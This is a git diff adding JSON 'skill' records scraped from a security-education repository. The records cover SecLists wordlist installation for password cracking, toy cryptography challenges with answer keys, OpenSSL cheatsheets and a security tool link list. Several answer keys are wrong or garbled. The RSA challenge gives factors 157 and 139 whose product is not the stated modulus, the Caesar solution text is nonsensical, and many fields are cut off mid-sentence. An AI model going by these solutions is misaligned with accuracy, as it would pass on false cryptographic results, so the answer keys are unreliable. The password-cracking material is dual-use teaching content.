+++ b/skills/cracking_passwords_e6d31dc813cf.json
@@ -0,0 +1,25 @@
+{
+ "id": "cracking_passwords_e6d31dc813cf",
+ "category": "cracking-passwords",
+ "title": "SecLists",
+ "description": "# Daniel Miessler's SecLists is the Bomb!\n\n[SecLists](https://github.com/danielmiessler/SecLists) include numerous wordlists that can be used for web application discovery, fuzzing, password cracking with millions of passwords from breaches, default passwords, pattern-matching, payloads, usernames, web-shells, and more.\n\nYou can install it using the following methods:\n\n**Zip**\n```\nwget -c https://github.com/danielmiessler/SecLists/archive/master.zip -O SecList.zip \\\n && unzip SecList.zip \\\n &&",
+ "payloads": [
+ "# Daniel Miessler's SecLists is the Bomb!",
+ "[SecLists](https://github.com/danielmiessler/SecLists) include numerous wordlists that can be used for web application discovery, fuzzing, password cracking with millions of passwords from breaches, default passwords, pattern-matching, payloads, usernames, web-shells, and more.",
+ "You can install it using the following methods:",
+ "**Zip**",
+ "wget -c https://github.com/danielmiessler/SecLists/archive/master.zip -O SecList.zip \\",
+ "&& unzip SecList.zip \\",
+ "&& rm -f SecList.zip",
+ "**Git (Small)**",
+ "git clone --depth 1 https://github.com/danielmiessler/SecLists.git",
+ "**Git (Complete)**",
+ "git clone https://github.com/danielmiessler/SecLists.git",
+ "**Kali Linux** ([Tool Page](https://tools.kali.org/password-attacks/seclists))",
+ "apt -y install seclists"
+ ],
+ "source": "h4cker",
+ "references": [
+ "/workspaces/hunter-skill/h4cker/cracking-passwords/SecLists.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/cryptography_and_pki_09bbd984251f.json b/skills/cryptography_and_pki_09bbd984251f.json
new file mode 100644
index 0000000..f9ac463
--- /dev/null
+++ b/skills/cryptography_and_pki_09bbd984251f.json
@@ -0,0 +1,27 @@
+{
+ "id": "cryptography_and_pki_09bbd984251f",
+ "category": "cryptography-and-pki",
+ "title": "09 Attack on Weak RSA Modulus",
+ "description": "# RSA Public Key Crack\n\n**Level:** Advanced\n\n**Description:**\nIn this challenge, you'll need to reverse an RSA public key to discover the private key. RSA is a widely used public-key cryptosystem that relies on the difficulty of factoring the product of two large prime numbers.\n\n**Challenge Text:**\n```\nGiven RSA public key (n, e) = (43733, 3)\n```\n\n**Instructions:**\n1. Factorize the modulus `n` into its prime components `p` and `q`.\n2. Compute the private exponent `d` using the public exponent `e",
+ "payloads": [
+ "# RSA Public Key Crack",
+ "**Level:** Advanced",
+ "**Description:**",
+ "In this challenge, you'll need to reverse an RSA public key to discover the private key. RSA is a widely used public-key cryptosystem that relies on the difficulty of factoring the product of two large prime numbers.",
+ "**Challenge Text:**",
+ "Given RSA public key (n, e) = (43733, 3)",
+ "**Instructions:**",
+ "1. Factorize the modulus `n` into its prime components `p` and `q`.",
+ "2. Compute the private exponent `d` using the public exponent `e`.",
+ "3. Validate the private key by encrypting and decrypting a test message.",
+ "**Answer:**",
+ "1. Factorize `n` into `p` and `q`. Here, \\( p = 157 \\), \\( q = 139 \\).",
+ "2. Compute \\(\\phi(n) = (p - 1)(q - 1) = 43264\\).",
+ "3. Compute the private exponent \\( d \\equiv e^{-1} \\mod \\phi(n) = 28843 \\).",
+ "**Python Code:**"
+ ],
+ "source": "h4cker",
+ "references": [
+ "/workspaces/hunter-skill/h4cker/cryptography-and-pki/challenges/09_Attack_on_Weak_RSA_Modulus.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/cryptography_and_pki_15ab0d9b2827.json b/skills/cryptography_and_pki_15ab0d9b2827.json
new file mode 100644
index 0000000..1d5e75a
--- /dev/null
+++ b/skills/cryptography_and_pki_15ab0d9b2827.json
@@ -0,0 +1,27 @@
+{
+ "id": "cryptography_and_pki_15ab0d9b2827",
+ "category": "cryptography-and-pki",
+ "title": "06 Digital Signature Forgery Advanced",
+ "description": "# Challenge 6: Digital Signature Forgery\n\n**Level:** Advanced\n\n**Description:**\nProvide a digital signature scheme with a weakness (e.g., using a small prime number). Forge a digital signature for a new message.\n\n**Challenge Text:**\n```\nSignature scheme: RSA with n = 391, e = 3, d = 107\nSigned message: (\"HELLO\", signature = 220)\nChallenge: Forge a signature for the message \"WORLD\"\n```\n\n**Instructions:**\n1. Understand the weakness in the provided RSA signature scheme.\n2. Forge a signature for the",
+ "payloads": [
+ "# Challenge 6: Digital Signature Forgery",
+ "**Level:** Advanced",
+ "**Description:**",
+ "Provide a digital signature scheme with a weakness (e.g., using a small prime number). Forge a digital signature for a new message.",
+ "**Challenge Text:**",
+ "Signature scheme: RSA with n = 391, e = 3, d = 107",
+ "Signed message: (\"HELLO\", signature = 220)",
+ "Challenge: Forge a signature for the message \"WORLD\"",
+ "**Instructions:**",
+ "1. Understand the weakness in the provided RSA signature scheme.",
+ "2. Forge a signature for the new message.",
+ "3. Validate the forged signature.",
+ "**Answer:**",
+ "For the message \"WORLD,\" a forged signature could be 115.",
+ "**Code:**"
+ ],
+ "source": "h4cker",
+ "references": [
+ "/workspaces/hunter-skill/h4cker/cryptography-and-pki/challenges/06_Digital_Signature_Forgery_Advanced.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/cryptography_and_pki_1b1dffd08826.json b/skills/cryptography_and_pki_1b1dffd08826.json
new file mode 100644
index 0000000..d4198c8
--- /dev/null
+++ b/skills/cryptography_and_pki_1b1dffd08826.json
@@ -0,0 +1,27 @@
+{
+ "id": "cryptography_and_pki_1b1dffd08826",
+ "category": "cryptography-and-pki",
+ "title": "tls ssl guide",
+ "description": "# TLS/SSL Complete Practical Guide\n\n## Table of Contents\n- [Introduction to TLS/SSL](#introduction-to-tlsssl)\n- [TLS Protocol Overview](#tls-protocol-overview)\n- [Certificate Configuration](#certificate-configuration)\n- [Cipher Suite Selection](#cipher-suite-selection)\n- [Modern TLS Configuration](#modern-tls-configuration)\n- [Testing and Validation](#testing-and-validation)\n- [Performance Optimization](#performance-optimization)\n- [Security Best Practices](#security-best-practices)\n- [Troublesh",
+ "payloads": [
+ "# TLS/SSL Complete Practical Guide",
+ "## Table of Contents",
+ "- [Introduction to TLS/SSL](#introduction-to-tlsssl)",
+ "- [TLS Protocol Overview](#tls-protocol-overview)",
+ "- [Certificate Configuration](#certificate-configuration)",
+ "- [Cipher Suite Selection](#cipher-suite-selection)",
+ "- [Modern TLS Configuration](#modern-tls-configuration)",
+ "- [Testing and Validation](#testing-and-validation)",
+ "- [Performance Optimization](#performance-optimization)",
+ "- [Security Best Practices](#security-best-practices)",
+ "- [Troubleshooting](#troubleshooting)",
+ "## Introduction to TLS/SSL",
+ "Transport Layer Security (TLS) and its predecessor Secure Sockets Layer (SSL) are cryptographic protocols designed to provide secure communications over a computer network.",
+ "### Protocol Evolution",
+ "| Protocol | Year | Status | Notes |"
+ ],
+ "source": "h4cker",
+ "references": [
+ "/workspaces/hunter-skill/h4cker/cryptography-and-pki/tutorials/tls-ssl-guide.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/cryptography_and_pki_211506406813.json b/skills/cryptography_and_pki_211506406813.json
new file mode 100644
index 0000000..38febbe
--- /dev/null
+++ b/skills/cryptography_and_pki_211506406813.json
@@ -0,0 +1,27 @@
+{
+ "id": "cryptography_and_pki_211506406813",
+ "category": "cryptography-and-pki",
+ "title": "04 Classic Vigenere Cipher",
+ "description": "# Challenge 4: Classic Vigen\u00e8re Cipher\n\n**Level:** Beginner\n\n**Description:**\nCrack a message encrypted using the Vigen\u00e8re cipher with a known keyword.\n\n**Challenge Text:**\n```\nEncrypted Message: \"XBGXLTVJZTFKTRDCXWPNCRTGDHDDJQKFTZR\"\nKeyword: \"KEYWORD\"\n```\n\n**Instructions:**\n1. Utilize the given keyword to decrypt the Vigen\u00e8re cipher.\n2. Provide the original plaintext.\n\n\n**Answer:**\nThe decrypted message is \"WELCOMETOTHEWORLDOFCRYPTOGRAPHY\"\n\n**Code:**\n```python\ndef decrypt_vigenere(ciphertext, k",
+ "payloads": [
+ "# Challenge 4: Classic Vigen\u00e8re Cipher",
+ "**Level:** Beginner",
+ "**Description:**",
+ "Crack a message encrypted using the Vigen\u00e8re cipher with a known keyword.",
+ "**Challenge Text:**",
+ "Encrypted Message: \"XBGXLTVJZTFKTRDCXWPNCRTGDHDDJQKFTZR\"",
+ "Keyword: \"KEYWORD\"",
+ "**Instructions:**",
+ "1. Utilize the given keyword to decrypt the Vigen\u00e8re cipher.",
+ "2. Provide the original plaintext.",
+ "**Answer:**",
+ "The decrypted message is \"WELCOMETOTHEWORLDOFCRYPTOGRAPHY\"",
+ "**Code:**",
+ "```python",
+ "def decrypt_vigenere(ciphertext, keyword):"
+ ],
+ "source": "h4cker",
+ "references": [
+ "/workspaces/hunter-skill/h4cker/cryptography-and-pki/challenges/04_Classic_Vigenere_Cipher.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/cryptography_and_pki_3fda8439acb7.json b/skills/cryptography_and_pki_3fda8439acb7.json
new file mode 100644
index 0000000..04164af
--- /dev/null
+++ b/skills/cryptography_and_pki_3fda8439acb7.json
@@ -0,0 +1,27 @@
+{
+ "id": "cryptography_and_pki_3fda8439acb7",
+ "category": "cryptography-and-pki",
+ "title": "openssl cheatsheet",
+ "description": "# OpenSSL Quick Reference Cheat Sheet\n\n## Key Generation\n\n### RSA Keys\n```bash\n# Generate RSA private key (modern)\nopenssl genpkey -algorithm RSA -pkcs8 -out key.pem\n\n# Generate with specific key size\nopenssl genpkey -algorithm RSA -pkeyopt rsa_keygen_bits:3072 -out key.pem\n\n# Generate encrypted private key\nopenssl genpkey -algorithm RSA -pkcs8 -aes256 -out key.pem\n\n# Legacy RSA generation\nopenssl genrsa -out key.pem 3072\nopenssl genrsa -aes256 -out key.pem 3072\n```\n\n### EC (Elliptic Curve) Keys",
+ "payloads": [
+ "# OpenSSL Quick Reference Cheat Sheet",
+ "## Key Generation",
+ "### RSA Keys",
+ "```bash",
+ "# Generate RSA private key (modern)",
+ "openssl genpkey -algorithm RSA -pkcs8 -out key.pem",
+ "# Generate with specific key size",
+ "openssl genpkey -algorithm RSA -pkeyopt rsa_keygen_bits:3072 -out key.pem",
+ "# Generate encrypted private key",
+ "openssl genpkey -algorithm RSA -pkcs8 -aes256 -out key.pem",
+ "# Legacy RSA generation",
+ "openssl genrsa -out key.pem 3072",
+ "openssl genrsa -aes256 -out key.pem 3072",
+ "### EC (Elliptic Curve) Keys",
+ "```bash"
+ ],
+ "source": "h4cker",
+ "references": [
+ "/workspaces/hunter-skill/h4cker/cryptography-and-pki/quick-reference/openssl-cheatsheet.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/cryptography_and_pki_428a3d096ef4.json b/skills/cryptography_and_pki_428a3d096ef4.json
new file mode 100644
index 0000000..74495d9
--- /dev/null
+++ b/skills/cryptography_and_pki_428a3d096ef4.json
@@ -0,0 +1,27 @@
+{
+ "id": "cryptography_and_pki_428a3d096ef4",
+ "category": "cryptography-and-pki",
+ "title": "cert openssl",
+ "description": "# Certificate Management with OpenSSL\n\nOpenSSL is a robust, full-featured cryptographic library and toolkit that provides essential cryptographic functions for secure communications. This guide covers traditional certificate operations and modern post-quantum cryptography approaches.\n\n## Overview\n\nOpenSSL supports:\n- **Cryptographic Functions**: Encryption, decryption, digital signatures, hash functions, key management\n- **Protocols**: SSL/TLS, DTLS, SSH, and emerging post-quantum protocols\n- **",
+ "payloads": [
+ "# Certificate Management with OpenSSL",
+ "OpenSSL is a robust, full-featured cryptographic library and toolkit that provides essential cryptographic functions for secure communications. This guide covers traditional certificate operations and modern post-quantum cryptography approaches.",
+ "## Overview",
+ "OpenSSL supports:",
+ "- **Cryptographic Functions**: Encryption, decryption, digital signatures, hash functions, key management",
+ "- **Protocols**: SSL/TLS, DTLS, SSH, and emerging post-quantum protocols",
+ "- **Certificate Management**: Generation, validation, conversion, and troubleshooting",
+ "- **Post-Quantum Readiness**: Hybrid implementations and migration strategies",
+ "\u26a0\ufe0f **Security Notice**: RSA and ECC certificates are deprecated due to quantum vulnerability. Consider hybrid approaches combining classical and post-quantum algorithms for future-proofing.",
+ "## Traditional Certificate Generation",
+ "### RSA Certificates (Legacy - Quantum Vulnerable)",
+ "\u26a0\ufe0f **Deprecated**: RSA is quantum-vulnerable. Use only for legacy compatibility.",
+ "```bash",
+ "# Generate RSA private key (minimum 3072 bits)",
+ "openssl genpkey -algorithm RSA -pkcs8 -out rsa_private.key -aes256 -pass pass:your_password"
+ ],
+ "source": "h4cker",
+ "references": [
+ "/workspaces/hunter-skill/h4cker/cryptography-and-pki/cert_openssl.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/cryptography_and_pki_4adf50d41867.json b/skills/cryptography_and_pki_4adf50d41867.json
new file mode 100644
index 0000000..1fa3d19
--- /dev/null
+++ b/skills/cryptography_and_pki_4adf50d41867.json
@@ -0,0 +1,27 @@
+{
+ "id": "cryptography_and_pki_4adf50d41867",
+ "category": "cryptography-and-pki",
+ "title": "08 Elliptic Curve Key Pair Generation",
+ "description": "# Elliptic Curve Key Pair Generation\n\n**Level:** Intermediate\n\n**Description:**\nIn this challenge, you'll work with elliptic curves over a finite field to generate and validate an elliptic curve key pair. Elliptic curve cryptography is a robust and efficient form of public-key cryptography used in modern security protocols.\n\n**Challenge Text:**\n```\nGiven Elliptic Curve y^2 = x^3 + 2x + 3 over F_17, base point G = (6, 3), private key d = 10\n```\n\n**Instructions:**\n1. Compute the public key corresp",
+ "payloads": [
+ "# Elliptic Curve Key Pair Generation",
+ "**Level:** Intermediate",
+ "**Description:**",
+ "In this challenge, you'll work with elliptic curves over a finite field to generate and validate an elliptic curve key pair. Elliptic curve cryptography is a robust and efficient form of public-key cryptography used in modern security protocols.",
+ "**Challenge Text:**",
+ "Given Elliptic Curve y^2 = x^3 + 2x + 3 over F_17, base point G = (6, 3), private key d = 10",
+ "**Instructions:**",
+ "1. Compute the public key corresponding to the given private key.",
+ "2. Validate that the public key lies on the given elliptic curve.",
+ "**Answer:**",
+ "The public key can be computed by multiplying the base point \\( G \\) with the private key \\( d \\):",
+ "Q = d \\cdot G = 10 \\cdot (6, 3) = (15, 13)",
+ "Verify that the point lies on the curve by substituting into the equation:",
+ "y^2 \\equiv x^3 + 2x + 3 \\mod 17",
+ "Substituting \\( x = 15 \\) and \\( y = 13 \\):"
+ ],
+ "source": "h4cker",
+ "references": [
+ "/workspaces/hunter-skill/h4cker/cryptography-and-pki/challenges/08_Elliptic_Curve_Key_Pair_Generation.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/cryptography_and_pki_60763b750b0a.json b/skills/cryptography_and_pki_60763b750b0a.json
new file mode 100644
index 0000000..2327437
--- /dev/null
+++ b/skills/cryptography_and_pki_60763b750b0a.json
@@ -0,0 +1,27 @@
+{
+ "id": "cryptography_and_pki_60763b750b0a",
+ "category": "cryptography-and-pki",
+ "title": "tools",
+ "description": "# Cryptography And Pki Tools\n\nThis is a curated list of tools for this category.\n\n---\n\n- [AES Finder - Utility To Find AES Keys In Running Processes](http://feedproxy.google.com/~r/PentestTools/~3/GypI0kZbP-g/aes-finder-utility-to-find-aes-keys-in.html)\n- [AES256_Passwd_Store - Secure Open-Source Password Manager](http://feedproxy.google.com/~r/PentestTools/~3/-DNEyil7GdE/aes256passwdstore-secure-open-source.html)\n- [ATTPwn - Tool Designed To Emulate Adversaries](http://feedproxy.google.com/~r/P",
+ "payloads": [
+ "# Cryptography And Pki Tools",
+ "This is a curated list of tools for this category.",
+ "- [AES Finder - Utility To Find AES Keys In Running Processes](http://feedproxy.google.com/~r/PentestTools/~3/GypI0kZbP-g/aes-finder-utility-to-find-aes-keys-in.html)",
+ "- [AES256_Passwd_Store - Secure Open-Source Password Manager](http://feedproxy.google.com/~r/PentestTools/~3/-DNEyil7GdE/aes256passwdstore-secure-open-source.html)",
+ "- [ATTPwn - Tool Designed To Emulate Adversaries](http://feedproxy.google.com/~r/PentestTools/~3/q32gGRq-0Ik/attpwn-tool-designed-to-emulate.html)",
+ "- [AnonX - An Encrypted File Transfer Via AES-256-CBC](http://feedproxy.google.com/~r/PentestTools/~3/eXmPteIPVsk/anonx-encrypted-file-transfer-via-aes.html)",
+ "- [Bkcrack - Crack Legacy Zip Encryption With Biham And Kocher's Known Plaintext Attack](http://www.kitploit.com/2023/01/bkcrack-crack-legacy-zip-encryption.html)",
+ "- [CertVerify - A Scanner That Files With Compromised Or Untrusted Code Signing Certificates](http://www.kitploit.com/2023/03/certverify-scanner-that-files-with.html)",
+ "- [CertWatcher - A Tool For Capture And Tracking Certificate Transparency Logs, Using YAML Templates Based DSL](http://www.kitploit.com/2023/03/certwatcher-tool-for-capture-and.html)",
+ "- [Certwatcher - Tool For Capture And Tracking Certificate Transparency Logs, Using YAML Templates Based DSL](http://www.kitploit.com/2023/04/certwatcher-tool-for-capture-and.html)",
+ "- [Cloak - A Censorship Circumvention Tool To Evade Detection By Authoritarian State Adversaries](http://www.kitploit.com/2022/04/cloak-censorship-circumvention-tool-to.html)",
+ "- [Corsair_Scan - A Security Tool To Test Cross-Origin Resource Sharing (CORS)](http://feedproxy.google.com/~r/PentestTools/~3/xGYeKuaQPkM/corsairscan-security-tool-to-test-cross.html)",
+ "- [CryptonDie - A Ransomware Developed For Study Purposes](http://feedproxy.google.com/~r/PentestTools/~3/Z0YkIrBUmbw/cryptondie-ransomware-developed-for.html)",
+ "- [Cryptovenom - The Cryptography Swiss Army Knife](http://feedproxy.google.com/~r/PentestTools/~3/zjxbWl4WCwY/cryptovenom-cryptography-swiss-army.html)",
+ "- [Cryptr - A Simple Shell Utility For Encrypting And Decrypting Files Using OpenSSL](http://feedproxy.google.com/~r/PentestTools/~3/NXXuaKDq9VY/cryptr-simple-shell-utility-for.html)"
+ ],
+ "source": "h4cker",
+ "references": [
+ "/workspaces/hunter-skill/h4cker/cryptography-and-pki/tools.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/cryptography_and_pki_7bad0c404f81.json b/skills/cryptography_and_pki_7bad0c404f81.json
new file mode 100644
index 0000000..e41b15d
--- /dev/null
+++ b/skills/cryptography_and_pki_7bad0c404f81.json
@@ -0,0 +1,27 @@
+{
+ "id": "cryptography_and_pki_7bad0c404f81",
+ "category": "cryptography-and-pki",
+ "title": "crypto algorithms",
+ "description": "# Cryptographic Algorithms (2025 Edition)\n\nThis section summarizes current and emerging cryptographic standards, their quantum resistance, and migration guidance for modern security.\n\n## Current Standards\n\n### Public Key Encryption & Key Exchange\n\n| Algorithm | Status | Post-Quantum Ready |\n|---------------------|---------------------------|--------------------|\n| RSA | Deprecated: quantum-vulnerable | No |\n| ECC/ECDSA | Depre",
+ "payloads": [
+ "# Cryptographic Algorithms (2025 Edition)",
+ "This section summarizes current and emerging cryptographic standards, their quantum resistance, and migration guidance for modern security.",
+ "## Current Standards",
+ "### Public Key Encryption & Key Exchange",
+ "| Algorithm | Status | Post-Quantum Ready |",
+ "|---------------------|---------------------------|--------------------|",
+ "| RSA | Deprecated: quantum-vulnerable | No |",
+ "| ECC/ECDSA | Deprecated: quantum-vulnerable | No |",
+ "| Diffie-Hellman | Deprecated: quantum-vulnerable | No |",
+ "| ML-KEM (CRYSTALS-Kyber) | Approved (FIPS 203) | Yes |",
+ "| HQC (Hamming Quasi-Cyclic) | Selected (2025) | Yes |",
+ "### Digital Signatures",
+ "| Algorithm | Status | Post-Quantum Ready |",
+ "|---------------------|--------------------------|--------------------|",
+ "| RSA Signatures | Deprecated: quantum-vulnerable | No |"
+ ],
+ "source": "h4cker",
+ "references": [
+ "/workspaces/hunter-skill/h4cker/cryptography-and-pki/crypto_algorithms.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/cryptography_and_pki_7c746388ce28.json b/skills/cryptography_and_pki_7c746388ce28.json
new file mode 100644
index 0000000..54a905e
--- /dev/null
+++ b/skills/cryptography_and_pki_7c746388ce28.json
@@ -0,0 +1,27 @@
+{
+ "id": "cryptography_and_pki_7c746388ce28",
+ "category": "cryptography-and-pki",
+ "title": "lab 02 openssl certificates",
+ "description": "# Lab 2: OpenSSL Certificate Operations\n\n## Objectives\n- Generate private keys\n- Create Certificate Signing Requests (CSRs)\n- Generate self-signed certificates\n- Understand certificate structure\n- Verify certificate chains\n\n## Prerequisites\n- OpenSSL installed\n- Terminal/command line access\n- Basic understanding of PKI concepts\n\n## Estimated Time\n45-60 minutes\n\n## Lab Steps\n\n### Step 1: Verify OpenSSL Installation\n\n```bash\n# Check OpenSSL version\nopenssl version\n\n# Check available commands\nopens",
+ "payloads": [
+ "# Lab 2: OpenSSL Certificate Operations",
+ "## Objectives",
+ "- Generate private keys",
+ "- Create Certificate Signing Requests (CSRs)",
+ "- Generate self-signed certificates",
+ "- Understand certificate structure",
+ "- Verify certificate chains",
+ "## Prerequisites",
+ "- OpenSSL installed",
+ "- Terminal/command line access",
+ "- Basic understanding of PKI concepts",
+ "## Estimated Time",
+ "45-60 minutes",
+ "## Lab Steps",
+ "### Step 1: Verify OpenSSL Installation"
+ ],
+ "source": "h4cker",
+ "references": [
+ "/workspaces/hunter-skill/h4cker/cryptography-and-pki/labs/lab-02-openssl-certificates.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/cryptography_and_pki_7f65a98492b9.json b/skills/cryptography_and_pki_7f65a98492b9.json
new file mode 100644
index 0000000..e7be0c4
--- /dev/null
+++ b/skills/cryptography_and_pki_7f65a98492b9.json
@@ -0,0 +1,27 @@
+{
+ "id": "cryptography_and_pki_7f65a98492b9",
+ "category": "cryptography-and-pki",
+ "title": "code signing guide",
+ "description": "# Code Signing Complete Guide\n\n## Table of Contents\n- [Introduction to Code Signing](#introduction-to-code-signing)\n- [Code Signing Certificates](#code-signing-certificates)\n- [Platform-Specific Signing](#platform-specific-signing)\n- [Timestamping](#timestamping)\n- [Security Best Practices](#security-best-practices)\n- [Verification and Validation](#verification-and-validation)\n- [Troubleshooting](#troubleshooting)\n\n## Introduction to Code Signing\n\nCode signing is the process of digitally signing",
+ "payloads": [
+ "# Code Signing Complete Guide",
+ "## Table of Contents",
+ "- [Introduction to Code Signing](#introduction-to-code-signing)",
+ "- [Code Signing Certificates](#code-signing-certificates)",
+ "- [Platform-Specific Signing](#platform-specific-signing)",
+ "- [Timestamping](#timestamping)",
+ "- [Security Best Practices](#security-best-practices)",
+ "- [Verification and Validation](#verification-and-validation)",
+ "- [Troubleshooting](#troubleshooting)",
+ "## Introduction to Code Signing",
+ "Code signing is the process of digitally signing executables and scripts to confirm the software author and guarantee that the code has not been altered or corrupted since it was signed.",
+ "### Why Code Sign?",
+ "**Benefits:**",
+ "- **Authentication**: Verify the publisher's identity",
+ "- **Integrity**: Ensure code hasn't been tampered with"
+ ],
+ "source": "h4cker",
+ "references": [
+ "/workspaces/hunter-skill/h4cker/cryptography-and-pki/tutorials/code-signing-guide.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/cryptography_and_pki_8143d6dd8df4.json b/skills/cryptography_and_pki_8143d6dd8df4.json
new file mode 100644
index 0000000..5b79c70
--- /dev/null
+++ b/skills/cryptography_and_pki_8143d6dd8df4.json
@@ -0,0 +1,27 @@
+{
+ "id": "cryptography_and_pki_8143d6dd8df4",
+ "category": "cryptography-and-pki",
+ "title": "03 Digital Signature Forgery",
+ "description": "# Challenge 3: Hash Collision Challenge\n\n**Challenge Text:**\n```\nFind two different inputs that produce the first 24 bits of SHA-256 hash collision.\n```\n\n**Instructions:**\n1. Understand the properties of the SHA-256 hash function.\n2. Implement a chosen collision-finding algorithm, such as the birthday attack.\n3. Provide two different inputs that create the same truncated hash value.\n\n### Answer:\n\nGiven the complexity of SHA-256, finding collisions is non-trivial. However, we can simplify the tas",
+ "payloads": [
+ "# Challenge 3: Hash Collision Challenge",
+ "**Challenge Text:**",
+ "Find two different inputs that produce the first 24 bits of SHA-256 hash collision.",
+ "**Instructions:**",
+ "1. Understand the properties of the SHA-256 hash function.",
+ "2. Implement a chosen collision-finding algorithm, such as the birthday attack.",
+ "3. Provide two different inputs that create the same truncated hash value.",
+ "### Answer:",
+ "Given the complexity of SHA-256, finding collisions is non-trivial. However, we can simplify the task by only considering the first 24 bits of the hash. This reduces the search space, making the task more manageable for a classroom exercise.",
+ "The following is a code example to find two different inputs that produce the same first 24 bits of a SHA-256 hash:",
+ "```python",
+ "import hashlib",
+ "from random import randint",
+ "def hash_collision(bits=24):",
+ "hash_dict = {}"
+ ],
+ "source": "h4cker",
+ "references": [
+ "/workspaces/hunter-skill/h4cker/cryptography-and-pki/challenges/03_Digital_Signature_Forgery.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/cryptography_and_pki_860d5f7bbd9e.json b/skills/cryptography_and_pki_860d5f7bbd9e.json
new file mode 100644
index 0000000..e39d6d6
--- /dev/null
+++ b/skills/cryptography_and_pki_860d5f7bbd9e.json
@@ -0,0 +1,27 @@
+{
+ "id": "cryptography_and_pki_860d5f7bbd9e",
+ "category": "cryptography-and-pki",
+ "title": "disk encryption",
+ "description": "# Comprehensive Disk and Data Encryption Guide\n\nThis guide covers modern disk encryption solutions, from full-disk encryption to file-level protection, including post-quantum considerations, mobile device security, and enterprise key management strategies.\n\n## Table of Contents\n- [Full Disk Encryption](#full-disk-encryption)\n- [File-Level Encryption](#file-level-encryption)\n- [Mobile Device Encryption](#mobile-device-encryption)\n- [Post-Quantum Encryption](#post-quantum-encryption-options)\n- [En",
+ "payloads": [
+ "# Comprehensive Disk and Data Encryption Guide",
+ "This guide covers modern disk encryption solutions, from full-disk encryption to file-level protection, including post-quantum considerations, mobile device security, and enterprise key management strategies.",
+ "## Table of Contents",
+ "- [Full Disk Encryption](#full-disk-encryption)",
+ "- [File-Level Encryption](#file-level-encryption)",
+ "- [Mobile Device Encryption](#mobile-device-encryption)",
+ "- [Post-Quantum Encryption](#post-quantum-encryption-options)",
+ "- [Enterprise Key Management](#enterprise-key-management)",
+ "- [Cloud Storage Encryption](#cloud-storage-encryption)",
+ "- [Implementation Guides](#implementation-guides)",
+ "- [Security Best Practices](#security-best-practices)",
+ "## Full Disk Encryption",
+ "### VeraCrypt (Recommended)",
+ "**Cross-platform, quantum-resistant ready**",
+ "```bash"
+ ],
+ "source": "h4cker",
+ "references": [
+ "/workspaces/hunter-skill/h4cker/cryptography-and-pki/disk_encryption.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/cryptography_and_pki_887ad2e886b7.json b/skills/cryptography_and_pki_887ad2e886b7.json
new file mode 100644
index 0000000..e0105e9
--- /dev/null
+++ b/skills/cryptography_and_pki_887ad2e886b7.json
@@ -0,0 +1,27 @@
+{
+ "id": "cryptography_and_pki_887ad2e886b7",
+ "category": "cryptography-and-pki",
+ "title": "07 Frequency Analysis Attack Substitution",
+ "description": "# Frequency Analysis Attack on Substitution Cipher\n\n**Level:** Beginner\n\n**Description:**\nIn this challenge, you will decrypt a substitution cipher using frequency analysis. Frequency analysis is based on the observation that certain letters appear more frequently in English texts. By analyzing the frequency of letters in the cipher and comparing them to known frequencies of English letters, you can decrypt the message.\n\n**Challenge Text:**\n```\nEncrypted Message: \"BGXQLN RKDBFIQXQFLK RGNFQZRM ZR",
+ "payloads": [
+ "# Frequency Analysis Attack on Substitution Cipher",
+ "**Level:** Beginner",
+ "**Description:**",
+ "In this challenge, you will decrypt a substitution cipher using frequency analysis. Frequency analysis is based on the observation that certain letters appear more frequently in English texts. By analyzing the frequency of letters in the cipher and comparing them to known frequencies of English letters, you can decrypt the message.",
+ "**Challenge Text:**",
+ "Encrypted Message: \"BGXQLN RKDBFIQXQFLK RGNFQZRM ZRMQLOFX GDZBQLOLXR\"",
+ "**Instructions:**",
+ "1. Analyze the frequency of letters in the encrypted message.",
+ "2. Compare it with the typical frequency of English letters.",
+ "3. Substitute the letters to reveal the original text.",
+ "**Answer:**",
+ "Assuming the most frequent letter in the cipher text corresponds to the letter 'E' and mapping other characters by their frequency, you might decipher the message as:",
+ "\"PLEASE SUBMIT YOUR REPORT BEFORE FRIDAY\"",
+ "(Note: The actual solution might vary based on the specific substitution key used. This is a guided example.)",
+ "**Python Code:**"
+ ],
+ "source": "h4cker",
+ "references": [
+ "/workspaces/hunter-skill/h4cker/cryptography-and-pki/challenges/07_Frequency_Analysis_Attack_Substitution.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/cryptography_and_pki_9138bea0bb86.json b/skills/cryptography_and_pki_9138bea0bb86.json
new file mode 100644
index 0000000..b914024
--- /dev/null
+++ b/skills/cryptography_and_pki_9138bea0bb86.json
@@ -0,0 +1,27 @@
+{
+ "id": "cryptography_and_pki_9138bea0bb86",
+ "category": "cryptography-and-pki",
+ "title": "01 Classic Caesar Cipher",
+ "description": "# Challenge 1: Caesar Cipher Shift\n\n**Challenge Text:**\n```\nSifnz ebjnt, zpv ibwf cffo difdlfe! Dpvme zpv efdszqujpo uijt tfdsfu nfttbhf?\n```\n\n**Instructions:**\n1. Analyze the frequency of the letters, or use a brute-force approach to find the shift value.\n2. Write a program or manually shift the letters to decrypt the message, applying the reverse shift.\n3. Provide the original text.\n\n### Answer:\n\nThe Caesar cipher is a type of substitution cipher in which each character in the plaintext is 'sh",
+ "payloads": [
+ "# Challenge 1: Caesar Cipher Shift",
+ "**Challenge Text:**",
+ "Sifnz ebjnt, zpv ibwf cffo difdlfe! Dpvme zpv efdszqujpo uijt tfdsfu nfttbhf?",
+ "**Instructions:**",
+ "1. Analyze the frequency of the letters, or use a brute-force approach to find the shift value.",
+ "2. Write a program or manually shift the letters to decrypt the message, applying the reverse shift.",
+ "3. Provide the original text.",
+ "### Answer:",
+ "The Caesar cipher is a type of substitution cipher in which each character in the plaintext is 'shifted' a certain number of places down or up the alphabet. In this particular case, the shift value is 1.",
+ "**Decrypted Text:**",
+ "Rhemy dakim, you have been checked! Could you decrypting this secret message?",
+ "You can also use these code examples in Python to decrypt the message:",
